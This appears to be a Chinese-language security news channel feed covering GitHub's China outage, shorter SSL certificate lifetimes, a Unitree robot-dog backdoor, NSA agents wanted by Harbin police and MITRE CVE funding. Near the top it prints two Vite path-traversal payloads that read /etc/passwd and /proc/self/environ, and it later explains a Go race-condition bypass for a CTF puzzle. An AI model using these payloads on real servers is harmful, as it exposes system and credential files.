web除0解题之外AK，那很满足了

vite还在在发力

/@fs/etc/passwd?.svg?.wasm?init

CVE-2025-31486

vite还在在在发力

/@fs/app#/../proc/self/environ

CVE-2025-32395

需要猜vite项目所在地址，可以从403的返回界面看到（

#security
宇树Go1机器狗固件里默认安装了隧道服务，同时没有做出恰当的限制导致有API Key（在固件里）就可以访问狗，同时SSH服务默认打开并且是弱密码。

编者评论：如果是故意的，那我无话可说；如果不是故意的，那我只能说宇树开发团队毫无安全意识，这方面的水平真的堪忧。
https://cyberinsider.com/remote-access-backdoor-discovered-in-chinese-robot-dog-unitree-go1/

GitHub目前已屏蔽中国大陆访问

有登录状态的可以正常访问，其他情况返回403。

Itdog

📮投稿 ☘️频道 🌸聊天

github 403未登陆中国大陆IP用户

大概是主动屏蔽？

切了https重新测，这下全都是403了

GitHub目前已恢复中国大陆访问

更新：Github称无法在中国大陆访问是由于意外

Due to a configuration change with unintended impact, users that were not logged in who tried to visit GitHub.com from China were temporarily unable to access the site. For users already logged in, they could continue to access the site successfully. Impact started 2025/04/12 at 20:01 UTC. Impact was mitigated 2025/04/13 at 14:55 UTC.

The configuration changes that caused this impact have been reversed and users should no longer see problems when trying to access GitHub.com.

Itdog
GitHub Status

📮投稿 ☘️频道 🌸聊天

一年SSL证书将逐渐成为历史，CA/B论坛SC-081v3提案几乎全票通过

从26年开始，可签发的SSL/TLS证书的最长时间将分三年从原来的398天逐步缩减到47天

意味着你不得不去实现自动部署，长有效期证书的时代即将终结


https://groups.google.com/a/groups.cabforum.org/g/servercert-wg/c/9768xgUUfhQ
https://forum.naixi.net/thread-3496-1-1.html
https://github.com/cabforum/servercert/pull/553

美国加州人行横道按钮遭黑客入侵，被植入马斯克和扎克伯格语音

#Meta #特斯拉 #网安 #AI #加州 #国外

看门狗（确信）

请找出图中的漏洞，绕过safe = blackJack(name)

解：

图中的safe = blackJack(name)是赋值而不是创建变量

所以可以用条件竞争，让 ... safe := os.Open(...夹在safe = blackJack(name) 和 safe != nil 中间执行，把本来不为nil的safe变量强行变为nil

这就是新生赛的含金量吗

果然并发是万恶之源

哈尔滨市公安局公开通缉3名美国国家安全局（NSA）特工
为依法严厉打击境外势力对我网络攻击窃密犯罪，切实维护国家网络空间安全和人民生命财产安全，黑龙江省哈尔滨市公安局决定对3名隶属于美国国家安全局（NSA）的犯罪嫌疑人凯瑟琳·威尔逊（Katheryn A. Wilson）、罗伯特·思内尔（Robert J. Snelling）、斯蒂芬·约翰逊（Stephen W. Johnson）进行通缉。
#吃瓜

🚾，📦！

美国政府决定无限期限制英伟达对中国出口专用人工智能(AI)芯片"H20"的出口。 当初感觉到放宽限制的氛围,期待恢复出口,但最近随着中国对美国产品征收报复关税,美国再次转向勒紧限制缰绳的方向。

来源：每日经济 / Wall St Engine

美国CVE漏洞数据库面临资金枯竭危机

美国非营利组织 MITRE 负责维护的全球网络安全关键漏洞数据库——“常见漏洞与披露”（CVE），由政府提供的资金将于本周三到期，或将面临停摆。

CVE漏洞数据库是全球网络安全生态系统的重要基石，为各组织提供漏洞编号、严重程度分级及详细描述。安全专家担忧，一旦CVE漏洞数据库停摆，将严重冲击全球漏洞管理与应变机制，对企业和 CERT（电脑紧急应变小组）等都将产生“快速且严重”的连锁反应。

路透社

📮投稿 ☘️频道 🌸聊天